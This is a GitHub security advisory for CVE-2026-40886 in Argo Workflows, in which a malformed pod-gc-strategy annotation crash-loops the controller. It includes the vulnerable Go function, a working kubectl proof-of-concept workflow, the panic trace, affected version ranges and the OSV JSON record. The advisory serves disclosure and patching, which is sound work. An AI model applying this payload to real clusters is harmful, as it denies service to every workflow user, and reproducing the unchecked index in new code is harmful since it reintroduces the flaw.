GHSA-5JV8-H7QH-RF5P

Vulnerability from github – Published: 2026-04-23 21:39 – Updated: 2026-04-23 21:39
VLAI?
Summary
Argo Workflows: Unchecked annotation parsing in pod informer crashes Argo Workflows Controller
Details

Summary

An unchecked array index in the pod informer's podGCFromPod() function causes a controller-wide panic when a workflow pod carries a malformed workflows.argoproj.io/pod-gc-strategy annotation. Because the panic occurs inside an informer goroutine (outside the controller's recover() scope), it crashes the entire controller process. The poisoned pod persists across restarts, causing a crash loop that halts all workflow processing until the pod is manually deleted.

Details

podGCFromPod() splits the annotation value on "/" and unconditionally accesses parts[1]:

func podGCFromPod(pod *apiv1.Pod) wfv1.PodGC {
    if val, ok := pod.Annotations[common.AnnotationKeyPodGCStrategy]; ok {
        parts := strings.Split(val, "/")
        return wfv1.PodGC{Strategy: wfv1.PodGCStrategy(parts[0]), DeleteDelayDuration: parts[1]}
    }
    return wfv1.PodGC{Strategy: wfv1.PodGCOnPodNone}
}

If the annotation value contains no "/", parts has length 1 and parts[1] panics with index out of range.

The code was introduced in #14129 and affects versions:

  • 3.6.x: v3.6.5 through v3.6.19 (backport in #14263)
  • 3.7.x: v3.7.0-rc1 through v3.7.12
  • 4.x: v4.0.0-rc1 through v4.0.3
  • Not affected: v3.6.4 and earlier

PoC

Apply this workflow to a cluster running the Argo Workflows controller:

kubectl apply -n argo -f - <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  name: crash-podgc
spec:
  entrypoint: main
  serviceAccountName: default
  podGC:
    strategy: OnPodCompletion
  podMetadata:
    annotations:
      workflows.argoproj.io/pod-gc-strategy: "NoSlash"
  templates:
    - name: main
      container:
        image: alpine:3.18
        command: [echo, "hello"]
EOF

Within seconds the controller crashes. The controller pod will show CrashLoopBackOff with increasing restart count. Controller logs show:

panic: runtime error: index out of range [1] with length 1

goroutine 291 [running]:
github.com/argoproj/argo-workflows/v4/workflow/controller/pod.podGCFromPod(...)
    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:176
github.com/argoproj/argo-workflows/v4/workflow/controller/pod.(*Controller).commonPodEvent(...)
    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:197
github.com/argoproj/argo-workflows/v4/workflow/controller/pod.(*Controller).addPodEvent(...)
    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:246

Recovery requires deleting the poisoned workflow:

kubectl delete workflow -n argo crash-podgc

Impact

Any user who can submit workflows can crash the Argo Workflows controller and keep it down indefinitely. This is a denial-of-service against all workflows in the cluster. No workflows can make progress while the controller is crash-looping. The attacker needs only create permission on Workflow resources, which is the baseline permission for any Argo Workflows user.

Severity ?
7.7 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-workflows/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-workflows/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.7.0"
            },
            {
              "fixed": "3.7.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-workflows/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.6.5"
            },
            {
              "last_affected": "3.6.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40886"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-129"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-23T21:39:21Z",
    "nvd_published_at": "2026-04-23T19:17:28Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAn unchecked array index in the pod informer\u0027s `podGCFromPod()` function causes a controller-wide panic when a workflow pod carries a malformed `workflows.argoproj.io/pod-gc-strategy` annotation. Because the panic occurs inside an informer goroutine (outside the controller\u0027s `recover()` scope), it crashes the entire controller process. The poisoned pod persists across restarts, causing a crash loop that halts all workflow processing until the pod is manually deleted.\n\n### Details\n\n`podGCFromPod()` splits the annotation value on \"/\" and unconditionally accesses `parts[1]`:\n\n```go\nfunc podGCFromPod(pod *apiv1.Pod) wfv1.PodGC {\n    if val, ok := pod.Annotations[common.AnnotationKeyPodGCStrategy]; ok {\n        parts := strings.Split(val, \"/\")\n        return wfv1.PodGC{Strategy: wfv1.PodGCStrategy(parts[0]), DeleteDelayDuration: parts[1]}\n    }\n    return wfv1.PodGC{Strategy: wfv1.PodGCOnPodNone}\n}\n```\n\nIf the annotation value contains no \"/\", `parts` has length 1 and `parts[1]` panics with index out of range.\n\nThe code was introduced in [#14129](https://github.com/argoproj/argo-workflows/issues/14129) and  affects versions:\n\n  - 3.6.x: v3.6.5 through v3.6.19 (backport in [#14263](https://github.com/argoproj/argo-workflows/issues/14263))\n  - 3.7.x: v3.7.0-rc1 through v3.7.12\n  - 4.x: v4.0.0-rc1 through v4.0.3\n  - Not affected: v3.6.4 and earlier\n\n### PoC\n\nApply this workflow to a cluster running the Argo Workflows controller:\n\n```bash\nkubectl apply -n argo -f - \u003c\u003c\u0027EOF\u0027\napiVersion: argoproj.io/v1alpha1\nkind: Workflow\nmetadata:\n  name: crash-podgc\nspec:\n  entrypoint: main\n  serviceAccountName: default\n  podGC:\n    strategy: OnPodCompletion\n  podMetadata:\n    annotations:\n      workflows.argoproj.io/pod-gc-strategy: \"NoSlash\"\n  templates:\n    - name: main\n      container:\n        image: alpine:3.18\n        command: [echo, \"hello\"]\nEOF\n```\n\nWithin seconds the controller crashes. The controller pod will show `CrashLoopBackOff` with increasing restart count. Controller logs show:\n\n```\npanic: runtime error: index out of range [1] with length 1\n\ngoroutine 291 [running]:\ngithub.com/argoproj/argo-workflows/v4/workflow/controller/pod.podGCFromPod(...)\n    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:176\ngithub.com/argoproj/argo-workflows/v4/workflow/controller/pod.(*Controller).commonPodEvent(...)\n    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:197\ngithub.com/argoproj/argo-workflows/v4/workflow/controller/pod.(*Controller).addPodEvent(...)\n    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:246\n```\n\nRecovery requires deleting the poisoned workflow:\n\n```\nkubectl delete workflow -n argo crash-podgc\n```\n\n### Impact\n\nAny user who can submit workflows can crash the Argo Workflows controller and keep it down indefinitely. This is a denial-of-service against all workflows in the cluster. No workflows can make progress while the controller is crash-looping. The attacker needs only `create` permission on Workflow resources, which is the baseline permission for any Argo Workflows user.",
  "id": "GHSA-5jv8-h7qh-rf5p",
  "modified": "2026-04-23T21:39:21Z",
  "published": "2026-04-23T21:39:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-5jv8-h7qh-rf5p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40886"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/argoproj/argo-workflows"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Argo Workflows: Unchecked annotation parsing in pod informer crashes Argo Workflows Controller"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.